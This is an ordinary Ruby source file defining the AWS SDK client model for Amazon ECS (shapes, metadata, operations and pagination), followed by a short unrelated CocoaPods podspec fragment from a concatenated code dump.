SubmitTaskStateChangeRequest.add_member(:pull_stopped_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "pullStoppedAt"))
SubmitTaskStateChangeRequest.add_member(:execution_stopped_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "executionStoppedAt"))
SubmitTaskStateChangeRequest.struct_class = Types::SubmitTaskStateChangeRequest
SubmitTaskStateChangeResponse.add_member(:acknowledgment, Shapes::ShapeRef.new(shape: String, location_name: "acknowledgment"))
SubmitTaskStateChangeResponse.struct_class = Types::SubmitTaskStateChangeResponse
Task.add_member(:task_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskArn"))
Task.add_member(:cluster_arn, Shapes::ShapeRef.new(shape: String, location_name: "clusterArn"))
Task.add_member(:task_definition_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskDefinitionArn"))
Task.add_member(:container_instance_arn, Shapes::ShapeRef.new(shape: String, location_name: "containerInstanceArn"))
Task.add_member(:overrides, Shapes::ShapeRef.new(shape: TaskOverride, location_name: "overrides"))
Task.add_member(:last_status, Shapes::ShapeRef.new(shape: String, location_name: "lastStatus"))
Task.add_member(:desired_status, Shapes::ShapeRef.new(shape: String, location_name: "desiredStatus"))
Task.add_member(:cpu, Shapes::ShapeRef.new(shape: String, location_name: "cpu"))
Task.add_member(:memory, Shapes::ShapeRef.new(shape: String, location_name: "memory"))
Task.add_member(:containers, Shapes::ShapeRef.new(shape: Containers, location_name: "containers"))
Task.add_member(:started_by, Shapes::ShapeRef.new(shape: String, location_name: "startedBy"))
Task.add_member(:version, Shapes::ShapeRef.new(shape: Long, location_name: "version"))
Task.add_member(:stopped_reason, Shapes::ShapeRef.new(shape: String, location_name: "stoppedReason"))
Task.add_member(:connectivity, Shapes::ShapeRef.new(shape: Connectivity, location_name: "connectivity"))
Task.add_member(:connectivity_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "connectivityAt"))
Task.add_member(:pull_started_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "pullStartedAt"))
Task.add_member(:pull_stopped_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "pullStoppedAt"))
Task.add_member(:execution_stopped_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "executionStoppedAt"))
Task.add_member(:created_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "createdAt"))
Task.add_member(:started_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "startedAt"))
Task.add_member(:stopping_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "stoppingAt"))
Task.add_member(:stopped_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "stoppedAt"))
Task.add_member(:group, Shapes::ShapeRef.new(shape: String, location_name: "group"))
Task.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
Task.add_member(:platform_version, Shapes::ShapeRef.new(shape: String, location_name: "platformVersion"))
Task.add_member(:attachments, Shapes::ShapeRef.new(shape: Attachments, location_name: "attachments"))
Task.add_member(:health_status, Shapes::ShapeRef.new(shape: HealthStatus, location_name: "healthStatus"))
Task.struct_class = Types::Task
TaskDefinition.add_member(:task_definition_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskDefinitionArn"))
TaskDefinition.add_member(:container_definitions, Shapes::ShapeRef.new(shape: ContainerDefinitions, location_name: "containerDefinitions"))
TaskDefinition.add_member(:family, Shapes::ShapeRef.new(shape: String, location_name: "family"))
TaskDefinition.add_member(:task_role_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskRoleArn"))
TaskDefinition.add_member(:execution_role_arn, Shapes::ShapeRef.new(shape: String, location_name: "executionRoleArn"))
TaskDefinition.add_member(:network_mode, Shapes::ShapeRef.new(shape: NetworkMode, location_name: "networkMode"))
TaskDefinition.add_member(:revision, Shapes::ShapeRef.new(shape: Integer, location_name: "revision"))
TaskDefinition.add_member(:volumes, Shapes::ShapeRef.new(shape: VolumeList, location_name: "volumes"))
TaskDefinition.add_member(:status, Shapes::ShapeRef.new(shape: TaskDefinitionStatus, location_name: "status"))
TaskDefinition.add_member(:requires_attributes, Shapes::ShapeRef.new(shape: RequiresAttributes, location_name: "requiresAttributes"))
TaskDefinition.add_member(:placement_constraints, Shapes::ShapeRef.new(shape: TaskDefinitionPlacementConstraints, location_name: "placementConstraints"))
TaskDefinition.add_member(:compatibilities, Shapes::ShapeRef.new(shape: CompatibilityList, location_name: "compatibilities"))
TaskDefinition.add_member(:requires_compatibilities, Shapes::ShapeRef.new(shape: CompatibilityList, location_name: "requiresCompatibilities"))
TaskDefinition.add_member(:cpu, Shapes::ShapeRef.new(shape: String, location_name: "cpu"))
TaskDefinition.add_member(:memory, Shapes::ShapeRef.new(shape: String, location_name: "memory"))
TaskDefinition.struct_class = Types::TaskDefinition
TaskDefinitionPlacementConstraint.add_member(:type, Shapes::ShapeRef.new(shape: TaskDefinitionPlacementConstraintType, location_name: "type"))
TaskDefinitionPlacementConstraint.add_member(:expression, Shapes::ShapeRef.new(shape: String, location_name: "expression"))
TaskDefinitionPlacementConstraint.struct_class = Types::TaskDefinitionPlacementConstraint
TaskDefinitionPlacementConstraints.member = Shapes::ShapeRef.new(shape: TaskDefinitionPlacementConstraint)
TaskOverride.add_member(:container_overrides, Shapes::ShapeRef.new(shape: ContainerOverrides, location_name: "containerOverrides"))
TaskOverride.add_member(:task_role_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskRoleArn"))
TaskOverride.add_member(:execution_role_arn, Shapes::ShapeRef.new(shape: String, location_name: "executionRoleArn"))
TaskOverride.struct_class = Types::TaskOverride
Tasks.member = Shapes::ShapeRef.new(shape: Task)
Tmpfs.add_member(:container_path, Shapes::ShapeRef.new(shape: String, required: true, location_name: "containerPath"))
Tmpfs.add_member(:size, Shapes::ShapeRef.new(shape: Integer, required: true, location_name: "size"))
Tmpfs.add_member(:mount_options, Shapes::ShapeRef.new(shape: StringList, location_name: "mountOptions"))
Tmpfs.struct_class = Types::Tmpfs
TmpfsList.member = Shapes::ShapeRef.new(shape: Tmpfs)
Ulimit.add_member(:name, Shapes::ShapeRef.new(shape: UlimitName, required: true, location_name: "name"))
Ulimit.add_member(:soft_limit, Shapes::ShapeRef.new(shape: Integer, required: true, location_name: "softLimit"))
Ulimit.add_member(:hard_limit, Shapes::ShapeRef.new(shape: Integer, required: true, location_name: "hardLimit"))
Ulimit.struct_class = Types::Ulimit
UlimitList.member = Shapes::ShapeRef.new(shape: Ulimit)
UpdateContainerAgentRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
UpdateContainerAgentRequest.add_member(:container_instance, Shapes::ShapeRef.new(shape: String, required: true, location_name: "containerInstance"))
UpdateContainerAgentRequest.struct_class = Types::UpdateContainerAgentRequest
UpdateContainerAgentResponse.add_member(:container_instance, Shapes::ShapeRef.new(shape: ContainerInstance, location_name: "containerInstance"))
UpdateContainerAgentResponse.struct_class = Types::UpdateContainerAgentResponse
UpdateContainerInstancesStateRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
UpdateContainerInstancesStateRequest.add_member(:container_instances, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "containerInstances"))
UpdateContainerInstancesStateRequest.add_member(:status, Shapes::ShapeRef.new(shape: ContainerInstanceStatus, required: true, location_name: "status"))
UpdateContainerInstancesStateRequest.struct_class = Types::UpdateContainerInstancesStateRequest
UpdateContainerInstancesStateResponse.add_member(:container_instances, Shapes::ShapeRef.new(shape: ContainerInstances, location_name: "containerInstances"))
UpdateContainerInstancesStateResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
UpdateContainerInstancesStateResponse.struct_class = Types::UpdateContainerInstancesStateResponse
UpdateServiceRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
UpdateServiceRequest.add_member(:service, Shapes::ShapeRef.new(shape: String, required: true, location_name: "service"))
UpdateServiceRequest.add_member(:desired_count, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "desiredCount"))
UpdateServiceRequest.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, location_name: "taskDefinition"))
UpdateServiceRequest.add_member(:deployment_configuration, Shapes::ShapeRef.new(shape: DeploymentConfiguration, location_name: "deploymentConfiguration"))
UpdateServiceRequest.add_member(:network_configuration, Shapes::ShapeRef.new(shape: NetworkConfiguration, location_name: "networkConfiguration"))
UpdateServiceRequest.add_member(:platform_version, Shapes::ShapeRef.new(shape: String, location_name: "platformVersion"))
UpdateServiceRequest.add_member(:force_new_deployment, Shapes::ShapeRef.new(shape: Boolean, location_name: "forceNewDeployment"))
UpdateServiceRequest.add_member(:health_check_grace_period_seconds, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "healthCheckGracePeriodSeconds"))
UpdateServiceRequest.struct_class = Types::UpdateServiceRequest
UpdateServiceResponse.add_member(:service, Shapes::ShapeRef.new(shape: Service, location_name: "service"))
UpdateServiceResponse.struct_class = Types::UpdateServiceResponse
VersionInfo.add_member(:agent_version, Shapes::ShapeRef.new(shape: String, location_name: "agentVersion"))
VersionInfo.add_member(:agent_hash, Shapes::ShapeRef.new(shape: String, location_name: "agentHash"))
VersionInfo.add_member(:docker_version, Shapes::ShapeRef.new(shape: String, location_name: "dockerVersion"))
VersionInfo.struct_class = Types::VersionInfo
Volume.add_member(:name, Shapes::ShapeRef.new(shape: String, location_name: "name"))
Volume.add_member(:host, Shapes::ShapeRef.new(shape: HostVolumeProperties, location_name: "host"))
Volume.struct_class = Types::Volume
VolumeFrom.add_member(:source_container, Shapes::ShapeRef.new(shape: String, location_name: "sourceContainer"))
VolumeFrom.add_member(:read_only, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "readOnly"))
VolumeFrom.struct_class = Types::VolumeFrom
VolumeFromList.member = Shapes::ShapeRef.new(shape: VolumeFrom)
VolumeList.member = Shapes::ShapeRef.new(shape: Volume)
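    # Each member declared above is bound to its JSON wire name through
    # `location_name` (e.g. :container_path <-> "containerPath"), and each
    # `struct_class` assignment ties a shape to its struct in Types, which is
    # how request and response payloads are mapped onto plain Ruby structs.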
# @api private
API = Seahorse::Model::Api.new.tap do |api|
api.version = "2014-11-13"
api.metadata = {
"endpointPrefix" => "ecs",
"jsonVersion" => "1.1",
"protocol" => "json",
"serviceFullName" => "Amazon EC2 Container Service",
"signatureVersion" => "v4",
"targetPrefix" => "AmazonEC2ContainerServiceV20141113",
}
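    # This metadata drives transport and signing: requests go to the "ecs"
    # endpoint prefix, are signed with SigV4, and are serialized as AWS JSON 1.1,
    # with the target prefix combined with the operation name to form the
    # X-Amz-Target header.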
api.add_operation(:create_cluster, Seahorse::Model::Operation.new.tap do |o|
o.name = "CreateCluster"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: CreateClusterRequest)
o.output = Shapes::ShapeRef.new(shape: CreateClusterResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:create_service, Seahorse::Model::Operation.new.tap do |o|
o.name = "CreateService"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: CreateServiceRequest)
o.output = Shapes::ShapeRef.new(shape: CreateServiceResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: UnsupportedFeatureException)
o.errors << Shapes::ShapeRef.new(shape: PlatformUnknownException)
o.errors << Shapes::ShapeRef.new(shape: PlatformTaskDefinitionIncompatibilityException)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
end)
api.add_operation(:delete_attributes, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeleteAttributes"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DeleteAttributesRequest)
o.output = Shapes::ShapeRef.new(shape: DeleteAttributesResponse)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: TargetNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:delete_cluster, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeleteCluster"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DeleteClusterRequest)
o.output = Shapes::ShapeRef.new(shape: DeleteClusterResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ClusterContainsContainerInstancesException)
o.errors << Shapes::ShapeRef.new(shape: ClusterContainsServicesException)
o.errors << Shapes::ShapeRef.new(shape: ClusterContainsTasksException)
end)
api.add_operation(:delete_service, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeleteService"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DeleteServiceRequest)
o.output = Shapes::ShapeRef.new(shape: DeleteServiceResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceNotFoundException)
end)
api.add_operation(:deregister_container_instance, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeregisterContainerInstance"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DeregisterContainerInstanceRequest)
o.output = Shapes::ShapeRef.new(shape: DeregisterContainerInstanceResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:deregister_task_definition, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeregisterTaskDefinition"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DeregisterTaskDefinitionRequest)
o.output = Shapes::ShapeRef.new(shape: DeregisterTaskDefinitionResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:describe_clusters, Seahorse::Model::Operation.new.tap do |o|
o.name = "DescribeClusters"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DescribeClustersRequest)
o.output = Shapes::ShapeRef.new(shape: DescribeClustersResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:describe_container_instances, Seahorse::Model::Operation.new.tap do |o|
o.name = "DescribeContainerInstances"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DescribeContainerInstancesRequest)
o.output = Shapes::ShapeRef.new(shape: DescribeContainerInstancesResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:describe_services, Seahorse::Model::Operation.new.tap do |o|
o.name = "DescribeServices"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DescribeServicesRequest)
o.output = Shapes::ShapeRef.new(shape: DescribeServicesResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:describe_task_definition, Seahorse::Model::Operation.new.tap do |o|
o.name = "DescribeTaskDefinition"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DescribeTaskDefinitionRequest)
o.output = Shapes::ShapeRef.new(shape: DescribeTaskDefinitionResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:describe_tasks, Seahorse::Model::Operation.new.tap do |o|
o.name = "DescribeTasks"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DescribeTasksRequest)
o.output = Shapes::ShapeRef.new(shape: DescribeTasksResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:discover_poll_endpoint, Seahorse::Model::Operation.new.tap do |o|
o.name = "DiscoverPollEndpoint"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DiscoverPollEndpointRequest)
o.output = Shapes::ShapeRef.new(shape: DiscoverPollEndpointResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
end)
api.add_operation(:list_attributes, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListAttributes"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListAttributesRequest)
o.output = Shapes::ShapeRef.new(shape: ListAttributesResponse)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:list_clusters, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListClusters"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListClustersRequest)
o.output = Shapes::ShapeRef.new(shape: ListClustersResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
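    # The pager above marks ListClusters as paginated: `max_results` caps the
    # page size and the response's `next_token` is passed back as the request's
    # `next_token` to fetch the following page.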
api.add_operation(:list_container_instances, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListContainerInstances"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListContainerInstancesRequest)
o.output = Shapes::ShapeRef.new(shape: ListContainerInstancesResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:list_services, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListServices"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListServicesRequest)
o.output = Shapes::ShapeRef.new(shape: ListServicesResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:list_task_definition_families, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListTaskDefinitionFamilies"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListTaskDefinitionFamiliesRequest)
o.output = Shapes::ShapeRef.new(shape: ListTaskDefinitionFamiliesResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:list_task_definitions, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListTaskDefinitions"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListTaskDefinitionsRequest)
o.output = Shapes::ShapeRef.new(shape: ListTaskDefinitionsResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:list_tasks, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListTasks"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListTasksRequest)
o.output = Shapes::ShapeRef.new(shape: ListTasksResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceNotFoundException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:put_attributes, Seahorse::Model::Operation.new.tap do |o|
o.name = "PutAttributes"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: PutAttributesRequest)
o.output = Shapes::ShapeRef.new(shape: PutAttributesResponse)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: TargetNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: AttributeLimitExceededException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:register_container_instance, Seahorse::Model::Operation.new.tap do |o|
o.name = "RegisterContainerInstance"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: RegisterContainerInstanceRequest)
o.output = Shapes::ShapeRef.new(shape: RegisterContainerInstanceResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:register_task_definition, Seahorse::Model::Operation.new.tap do |o|
o.name = "RegisterTaskDefinition"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: RegisterTaskDefinitionRequest)
o.output = Shapes::ShapeRef.new(shape: RegisterTaskDefinitionResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:run_task, Seahorse::Model::Operation.new.tap do |o|
o.name = "RunTask"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: RunTaskRequest)
o.output = Shapes::ShapeRef.new(shape: RunTaskResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: UnsupportedFeatureException)
o.errors << Shapes::ShapeRef.new(shape: PlatformUnknownException)
o.errors << Shapes::ShapeRef.new(shape: PlatformTaskDefinitionIncompatibilityException)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: BlockedException)
end)
api.add_operation(:start_task, Seahorse::Model::Operation.new.tap do |o|
o.name = "StartTask"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: StartTaskRequest)
o.output = Shapes::ShapeRef.new(shape: StartTaskResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:stop_task, Seahorse::Model::Operation.new.tap do |o|
o.name = "StopTask"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: StopTaskRequest)
o.output = Shapes::ShapeRef.new(shape: StopTaskResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:submit_container_state_change, Seahorse::Model::Operation.new.tap do |o|
o.name = "SubmitContainerStateChange"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: SubmitContainerStateChangeRequest)
o.output = Shapes::ShapeRef.new(shape: SubmitContainerStateChangeResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
end)
api.add_operation(:submit_task_state_change, Seahorse::Model::Operation.new.tap do |o|
o.name = "SubmitTaskStateChange"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: SubmitTaskStateChangeRequest)
o.output = Shapes::ShapeRef.new(shape: SubmitTaskStateChangeResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
end)
api.add_operation(:update_container_agent, Seahorse::Model::Operation.new.tap do |o|
o.name = "UpdateContainerAgent"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: UpdateContainerAgentRequest)
o.output = Shapes::ShapeRef.new(shape: UpdateContainerAgentResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: UpdateInProgressException)
o.errors << Shapes::ShapeRef.new(shape: NoUpdateAvailableException)
o.errors << Shapes::ShapeRef.new(shape: MissingVersionException)
end)
api.add_operation(:update_container_instances_state, Seahorse::Model::Operation.new.tap do |o|
o.name = "UpdateContainerInstancesState"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: UpdateContainerInstancesStateRequest)
o.output = Shapes::ShapeRef.new(shape: UpdateContainerInstancesStateResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:update_service, Seahorse::Model::Operation.new.tap do |o|
o.name = "UpdateService"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: UpdateServiceRequest)
o.output = Shapes::ShapeRef.new(shape: UpdateServiceResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceNotActiveException)
o.errors << Shapes::ShapeRef.new(shape: PlatformUnknownException)
o.errors << Shapes::ShapeRef.new(shape: PlatformTaskDefinitionIncompatibilityException)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
end)
end
end
end
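# A minimal usage sketch of the model above, assuming standard aws-sdk-ruby
# client behavior; the region, cluster and task identifiers are placeholders,
# and `cluster_arns` is assumed to be the ListClusters response accessor:
#
#   require 'aws-sdk-ecs'
#
#   client = Aws::ECS::Client.new(region: 'us-east-1')
#
#   # ListClusters is registered with a pager, so pages can be enumerated and
#   # next_token is followed automatically.
#   client.list_clusters(max_results: 10).each_page do |page|
#     puts page.cluster_arns
#   end
#
#   # RunTask takes the members declared on RunTaskRequest above.
#   client.run_task(cluster: 'default', task_definition: 'my-task:1', count: 1)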
| 72.701175 | 175 | 0.768863 |
111ef0505b1f0ee13c13bef0f418b250cdcbef7a | 559 | require "json"
package = JSON.parse(File.read(File.join(__dir__, "package.json")))
Pod::Spec.new do |s|
s.name = "selleo-toast"
s.version = package["version"]
s.summary = package["description"]
s.homepage = package["homepage"]
s.license = package["license"]
s.authors = package["author"]
s.platforms = { :ios => "10.0" }
s.source = { :git => "https://github.com/bartoszboruta/selleo-toast.git", :tag => "#{s.version}" }
s.source_files = "ios/**/*.{h,m,mm,swift}"
s.dependency "React-Core"
end
| 27.95 | 106 | 0.592129 |
623163c79b52d995c8234f2658dd056a4d806931 | 7,420 | # -*- encoding: utf-8 -*-
